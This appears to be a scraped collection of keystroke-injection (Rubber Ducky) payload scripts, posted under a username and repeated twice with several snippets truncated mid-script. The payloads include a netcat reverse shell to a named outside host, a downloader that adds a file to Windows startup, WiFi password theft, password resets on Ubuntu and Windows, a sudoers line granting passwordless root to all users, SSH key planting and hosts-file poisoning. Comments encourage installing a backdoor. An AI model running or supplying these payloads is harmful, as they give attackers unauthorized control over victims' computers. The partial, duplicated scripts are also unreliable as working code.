Jonny Banana JonnyBanana

## ncat revershe shell
REM Get a reverse shell usign ncat.
REM Run `nc -l 9999` to wait for the reverse shell.
REM Make sure to update the hostname before using it.

DELAY 1000
ALT F2
DELAY 100
STRING sh -c "nc -e /bin/bash eternal-pickle 9999"
REM Delay to make it work in KDE. Not sure why that's necessary.
DELAY 100

## Download, Run and add file to Startup
REM Target OS: Windows 7, Not yet tested on 10 or 8
REM Change the 'DIRECTFILEURL' to a direct download link to your file. I recommend using Google Drive and going to this website to make REM them a direct download link
REM :https://sites.google.com/site/gdocs2direct/
REM This works by downloading the file via Internet Explorer then confirming the download. After that it creates a shortcut for the file  REM you uploaded and puts it in the shell:startup for the computer.
REM Also remember to replace 'FILENAMEHERE' to the name of your file so it can create the shortcut.
REM You may change the delays depending on how fast the target computer is.
REM Made By: TheUnkown

GUI r
DELAY 1000

## WiFi Pass Exfiltration
REM Password Stealing script by TylerTechNZ
REM
REM --> Create Obfuscated CMD
DELAY 2000
WINDOWS r
DELAY 200
STRING cmd
ENTER
DELAY 200
STRING MODE 20,1

## Ubuntu Password Resetter
REM Reseting Pasword on Ubuntu

CTRL ALT DELETE
STRING reboot
DELAY 10000
SHIFT
ENTER
ENTER
STRING mount -o rw,remount /
STRING passwd root

## Windows Password Resetter
REM This payload will remove the current users password on windows and give you keys to the kingdom

GUI r
STRING cmd
ENTER
DELAY 500

REM It is important that you change to the target username below, will continue to work on copy/pasting from cmd prompt

STRING net user USERNAME HERE ""

## Change All File Extension on .txt
DELAY 5000
GUI r
DELAY 200
STRING notepad.exe
DELAY 200
ENTER
DELAY 200
STRING "echo off
DELAY 200
ENTER

## Payload OSX Sudo for all users without password
REM MacOS AllSudo
REM Enables Sudo access for all users without a password
REM First boot the machine into single user mode - https://support.apple.com/en-us/HT201573
REM By Jesse Wallace (@c0deous)
REM https://c0deo.us/
DELAY 1000
STRING mount -uw / && chmod 755 /etc/sudoers && echo 'ALL    ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers && chmod 440 /etc/sudoers && shutdown -h now
ENTER
REM Now would be a great time to install a backdoor.  Ez root ;3
REM TODO Use visudo for edits (unconfirmed if working)

## Payload OSX Passwordless SSH access (ssh keys)
REM This script adds a ssh public key to the authorized_keys file on a target's mac.

DELAY 1000
COMMAND SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 800
STRING echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys

## Payload OSX Ascii Prank
DELAY 1000
GUI SPACE
STRING terminal
DELAY 1000
ENTER
DELAY 250
STRING say fuck off asshole
ENTER
GUI N
DELAY 250

## Payload OSX Local DNS Poisoning
REM A script to create a local DNS entry in the host file of a mac.
REM change the example.com to any site you want.
REM change the 127.0.0.1 to any ip you want.
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
ENTER
STRING nano /private/etc/hosts
ENTER
	REM Get a reverse shell usign ncat.
	REM Run `nc -l 9999` to wait for the reverse shell.
	REM Make sure to update the hostname before using it.

	DELAY 1000
	ALT F2
	DELAY 100
	STRING sh -c "nc -e /bin/bash eternal-pickle 9999"
	REM Delay to make it work in KDE. Not sure why that's necessary.
	DELAY 100
	REM Target OS: Windows 7, Not yet tested on 10 or 8
	REM Change the 'DIRECTFILEURL' to a direct download link to your file. I recommend using Google Drive and going to this website to make REM them a direct download link
	REM :https://sites.google.com/site/gdocs2direct/
	REM This works by downloading the file via Internet Explorer then confirming the download. After that it creates a shortcut for the file REM you uploaded and puts it in the shell:startup for the computer.
	REM Also remember to replace 'FILENAMEHERE' to the name of your file so it can create the shortcut.
	REM You may change the delays depending on how fast the target computer is.
	REM Made By: TheUnkown

	GUI r
	DELAY 1000
	REM Password Stealing script by TylerTechNZ
	REM
	REM --> Create Obfuscated CMD
	DELAY 2000
	WINDOWS r
	DELAY 200
	STRING cmd
	ENTER
	DELAY 200
	STRING MODE 20,1
	REM Reseting Pasword on Ubuntu

	CTRL ALT DELETE
	STRING reboot
	DELAY 10000
	SHIFT
	ENTER
	ENTER
	STRING mount -o rw,remount /
	STRING passwd root
	REM This payload will remove the current users password on windows and give you keys to the kingdom

	GUI r
	STRING cmd
	ENTER
	DELAY 500

	REM It is important that you change to the target username below, will continue to work on copy/pasting from cmd prompt

	STRING net user USERNAME HERE ""
	DELAY 5000
	GUI r
	DELAY 200
	STRING notepad.exe
	DELAY 200
	ENTER
	DELAY 200
	STRING "echo off
	DELAY 200
	ENTER
	REM MacOS AllSudo
	REM Enables Sudo access for all users without a password
	REM First boot the machine into single user mode - https://support.apple.com/en-us/HT201573
	REM By Jesse Wallace (@c0deous)
	REM https://c0deo.us/
	DELAY 1000
	STRING mount -uw / && chmod 755 /etc/sudoers && echo 'ALL ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers && chmod 440 /etc/sudoers && shutdown -h now
	ENTER
	REM Now would be a great time to install a backdoor. Ez root ;3
	REM TODO Use visudo for edits (unconfirmed if working)
	REM This script adds a ssh public key to the authorized_keys file on a target's mac.

	DELAY 1000
	COMMAND SPACE
	DELAY 500
	STRING Terminal
	DELAY 500
	ENTER
	DELAY 800
	STRING echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys
	DELAY 1000
	GUI SPACE
	STRING terminal
	DELAY 1000
	ENTER
	DELAY 250
	STRING say fuck off asshole
	ENTER
	GUI N
	DELAY 250
	REM A script to create a local DNS entry in the host file of a mac.
	REM change the example.com to any site you want.
	REM change the 127.0.0.1 to any ip you want.
	DELAY 1000
	STRING mount -uw /
	ENTER
	DELAY 2000
	ENTER
	STRING nano /private/etc/hosts
	ENTER